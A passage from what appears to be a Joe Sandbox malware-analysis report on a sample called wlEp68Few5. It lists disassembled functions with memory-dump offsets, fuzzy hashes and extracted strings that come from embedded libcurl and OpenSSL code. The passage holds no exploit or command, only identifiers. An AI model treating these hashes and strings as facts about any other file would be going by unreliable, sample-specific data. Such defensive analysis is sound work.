                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                                      • API String ID: 0-122532811
                                                      • Opcode ID: 15ec0530d6688f3b84d3ca32176359bff026b7b147690e64d8822460cc3e3b45
                                                      • Instruction ID: a17eb541e4b84596458aec19b17c1b8e8f740546424a38eec7e0dc1c5ee8fa24
                                                      • Opcode Fuzzy Hash: 15ec0530d6688f3b84d3ca32176359bff026b7b147690e64d8822460cc3e3b45
                                                      • Instruction Fuzzy Hash: 9E42E8B1B08701AFD718EE24CC81B6BB6EAEBC4704F04891DF65D97391D779A8148B92
                                                      Function 00483ED0 Relevance: 15.7, Strings: 12, Instructions: 689COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Apr$Aug$Dec$Feb$Jan$Jul$Jun$Mar$May$Nov$Oct$Sep
                                                      • API String ID: 0-3977460686
                                                      • Opcode ID: b464fd8fa310f0639725c89fe5a3762f6f29bb30f76b285e54b66d4a97e4925f
                                                      • Instruction ID: e94f72d6cc0b39d0d1879ff2f1cbab6f659298b0f404f5466a4e86a879cac0dc
                                                      • Opcode Fuzzy Hash: b464fd8fa310f0639725c89fe5a3762f6f29bb30f76b285e54b66d4a97e4925f
                                                      • Instruction Fuzzy Hash: 7B3208B1A083028BC724BE289C4131F7BD56BD1324F154F2FE9A59B3D1E63CD945879A
                                                      Function 00494F70 Relevance: 12.2, Strings: 9, Instructions: 911COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                                      • API String ID: 0-1914377741
                                                      • Opcode ID: f7579766d5512b66d62325cb09bb211207945020e4041e6348a06901ab9f3f5c
                                                      • Instruction ID: c81111dc1f97d41a57c4b63542807ef785fb42f82238d81b8a6e14bd5aaa3c08
                                                      • Opcode Fuzzy Hash: f7579766d5512b66d62325cb09bb211207945020e4041e6348a06901ab9f3f5c
                                                      • Instruction Fuzzy Hash: 04720830608B415FEF228A28C4467A77BD25F91344F28863EED855B393E77ED884C74A
                                                      Function 00529880 Relevance: 10.2, Strings: 8, Instructions: 226COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: attempts$ndot$retr$retr$rota$time$use-$usev
                                                      • API String ID: 0-2058201250
                                                      • Opcode ID: a5647a3e52ec519a1f407b6fb033783a52d6bf8214ffa1ffc8498effd50edce8
                                                      • Instruction ID: 09b7e3b87758ce6d45afea10a15834da9fc4ff238a829a031a3bd11cf984671e
                                                      • Opcode Fuzzy Hash: a5647a3e52ec519a1f407b6fb033783a52d6bf8214ffa1ffc8498effd50edce8
                                                      • Instruction Fuzzy Hash: D061E7A5A0831567E714A620BC57B3BBA99BFD6344F04883DFC8A973C2FE71D9448253
                                                      Function 00485DB0 Relevance: 10.1, Strings: 8, Instructions: 114COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %2lld.%0lldG$%2lld.%0lldM$%4lldG$%4lldM$%4lldP$%4lldT$%4lldk$%5lld
                                                      • API String ID: 0-3476178709
                                                      • Opcode ID: 197e59cd6d6e91faccd6387b90feb27cb97c340f8229a46bd29646b8ab6d8378
                                                      • Instruction ID: f602fd086c74e0a80d95358f7beab0a85c162c2266562265101f9cb922927b8b
                                                      • Opcode Fuzzy Hash: 197e59cd6d6e91faccd6387b90feb27cb97c340f8229a46bd29646b8ab6d8378
                                                      • Instruction Fuzzy Hash: B531E9B2B1494526F7682109DC46F3F009BC3C5B14F7AC63FBA06AB2C5D8E99D0543AA
                                                      Function 00630D80 Relevance: 9.5, Strings: 7, Instructions: 705COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !$EVP_DecryptFinal_ex$EVP_DecryptUpdate$EVP_EncryptFinal_ex$assertion failed: b <= sizeof(ctx->buf)$assertion failed: b <= sizeof(ctx->final)$crypto/evp/evp_enc.c
                                                      • API String ID: 0-2550110336
                                                      • Opcode ID: 552e0f933718086f22bd6c1e2c1117612e20e194bcc8fa08b890faca901c6422
                                                      • Instruction ID: 3ab9b46e795f0fafc27df6e2f626ede35f31296322f9cfa58d6193f72231248c
                                                      • Opcode Fuzzy Hash: 552e0f933718086f22bd6c1e2c1117612e20e194bcc8fa08b890faca901c6422
                                                      • Instruction Fuzzy Hash: EC323970748314BBE720AF64AC53F7AB797AF82B08F18452CF9449A2C2E770D954C6D6
                                                      Function 0053EF90 Relevance: 9.4, Strings: 7, Instructions: 688COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $.$;$?$?$xn--$xn--
                                                      • API String ID: 0-543057197
                                                      • Opcode ID: 6aa667bddc914ee6fec6764cdd86708abaa10e11c3fe52d7641940ff4512a2fd
                                                      • Instruction ID: 8d4bba271ee3c50782b6f8e3db80a4fe5d5a3a57263ccba9fd4a15d500f5e891
                                                      • Opcode Fuzzy Hash: 6aa667bddc914ee6fec6764cdd86708abaa10e11c3fe52d7641940ff4512a2fd
                                                      • Instruction Fuzzy Hash: 0C22F5B2E08302ABEB249A24DC45B6B7BE4BFD4348F14493CF95A97292E735DD04C752
                                                      Function 007FE030 Relevance: 9.1, APIs: 1, Strings: 3, Instructions: 2082COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $d$nil)
                                                      • API String ID: 0-394766432
                                                      • Opcode ID: 22ac26ecb48171c2500e5c29f7d619fd8a8a7b88c970e88b57a1cada2986069a
                                                      • Instruction ID: 8f574884de41adf152768e26d91a760be5901f2f1d2f3c90b6b0ef23ea0e3760
                                                      • Opcode Fuzzy Hash: 22ac26ecb48171c2500e5c29f7d619fd8a8a7b88c970e88b57a1cada2986069a
                                                      • Instruction Fuzzy Hash: DA135A70608749CFD760CF28C48472ABBE1BF89314F24492DEA959B3A1DB79EC45CB42
                                                      Function 0047A960 Relevance: 9.0, Strings: 6, Instructions: 1491COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                                      • API String ID: 0-2555271450
                                                      • Opcode ID: 4a1d0c3d5a94eee4b08feaa9cbfef41f7f1988319243cc88a24da1bd804d424f
                                                      • Instruction ID: 380b437f24c30c3061715ee0f9f54817431d7a3eb9d396a84898e53e1812fb6f
                                                      • Opcode Fuzzy Hash: 4a1d0c3d5a94eee4b08feaa9cbfef41f7f1988319243cc88a24da1bd804d424f
                                                      • Instruction Fuzzy Hash: 31C26A716083418FC714CE28C4907AAB7E2EFC9354F19C92EE99D9B351D738ED468B86
                                                      Function 0047E620 Relevance: 8.5, Strings: 6, Instructions: 1028COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                                      • API String ID: 0-2555271450
                                                      • Opcode ID: 332fb3e01dacba813d0e01575cf3e431871a007b535ab384753533f1cf4dda65
                                                      • Instruction ID: aaaebb81c44fdfa5a0ed75f176afb18a6cdf2958fc774781f17bb6866e76bbbb
                                                      • Opcode Fuzzy Hash: 332fb3e01dacba813d0e01575cf3e431871a007b535ab384753533f1cf4dda65
                                                      • Instruction Fuzzy Hash: B0828E71A083019FD714CE29C88476BB7E1AFC9324F14CA6EE9AD97391D738DC098B56
                                                      Function 004D6210 Relevance: 7.9, Strings: 6, Instructions: 419COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: default$login$macdef$machine$netrc.c$password
                                                      • API String ID: 0-1043775505
                                                      • Opcode ID: 1e8b5e60a32750589b0933d447d3a5ba45292edfaa2a6c9c63cb847b98c5eac7
                                                      • Instruction ID: 5fb666443cd4511ef68180fd992313eef0eaa785197c9b0aa769ac0cdcefd607
                                                      • Opcode Fuzzy Hash: 1e8b5e60a32750589b0933d447d3a5ba45292edfaa2a6c9c63cb847b98c5eac7
                                                      • Instruction Fuzzy Hash: C0E105705083419BE3219E2498A576B7BD4AF85708F06482FF8C957382E3BDD949CB5B
                                                      Function 00538F90 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 256COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
